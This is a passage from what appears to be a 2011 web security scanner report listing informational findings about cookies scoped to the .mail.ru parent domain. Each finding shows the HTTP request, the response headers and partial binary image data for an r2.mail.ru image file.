Set-Cookie: p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a/..................!.......,..../.....U.....c.......(.........j..[...
........H..p...7.)e../.B1M....4"5\...V...2`<8.........;

15.50. http://r2.mail.ru/b12526210.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526210.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526210.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 135
Connection: keep-alive
Set-Cookie: p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a................;.;............!.......,..........L(...%.X.......\$..hv...B@z........A....H.t.)...-P.d*6..@e2....J.RN...B...ht..;

15.51. http://r2.mail.ru/b12527647.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12527647.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12527647.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 131
Connection: keep-alive
Set-Cookie: p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a........P.....D................!.......,..........H....$.H.$B..k..UQ...\.(....9|sfF...7..0J.d..!..Q.09b&.0$......G.R...x.H..;

15.52. http://r2.mail.ru/b12529050.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12529050.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12529050.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/jpeg
Content-Length: 3351
Connection: keep-alive
Set-Cookie: p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.................................
...[SNIP]...

15.53. http://r2.mail.ru/b12530142.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12530142.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530142.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2303
Connection: keep-alive
Set-Cookie: p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.54. http://r2.mail.ru/b12530159.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12530159.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530159.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2119
Connection: keep-alive
Set-Cookie: p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.55. http://r2.mail.ru/b12531249.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531249.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531249.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 1807
Connection: keep-alive
Set-Cookie: p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.56. http://r2.mail.ru/b12531545.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531545.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531545.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1374
Connection: keep-alive
Set-Cookie: p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C....... .. ..........................................................<.<..!..............................
...[SNIP]...

15.57. http://r2.mail.ru/b12531624.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531624.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531624.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1811
Connection: keep-alive
Set-Cookie: p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<..!..............................
...[SNIP]...

15.58. http://r2.mail.ru/b12532203.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12532203.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12532203.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2157
Connection: keep-alive
Set-Cookie: p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................<.<.."..............................
...[SNIP]...

15.59. http://r2.mail.ru/b12752186.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752186.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752186.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 1841
Connection: keep-alive
Set-Cookie: p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C......................... ....................!........."$".$.......C..............................................
...[SNIP]...

15.60. http://r2.mail.ru/b12752583.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752583.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752583.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 1772
Connection: keep-alive
Set-Cookie: p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
....................................<.<..................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....
...[SNIP]...

15.61. http://r2.mail.ru/b12752584.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752584.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752584.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5872
Connection: keep-alive
Set-Cookie: p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.62. http://r2.mail.ru/b12752585.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752585.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752585.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5320
Connection: keep-alive
Set-Cookie: p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.63. http://r2.mail.ru/b12752586.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752586.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752586.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 4402
Connection: keep-alive
Set-Cookie: p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

15.64. http://r2.mail.ru/b12855502.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12855502.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12855502.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 2692
Connection: keep-alive
Set-Cookie: p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

15.65. http://r2.mail.ru/b12887675.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12887675.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887675.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3685
Connection: keep-alive
Set-Cookie: p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................<.<..
...[SNIP]...

15.66. http://r2.mail.ru/b12887676.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12887676.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887676.jpg HTTP/1.1
Host: r2.mail.ru
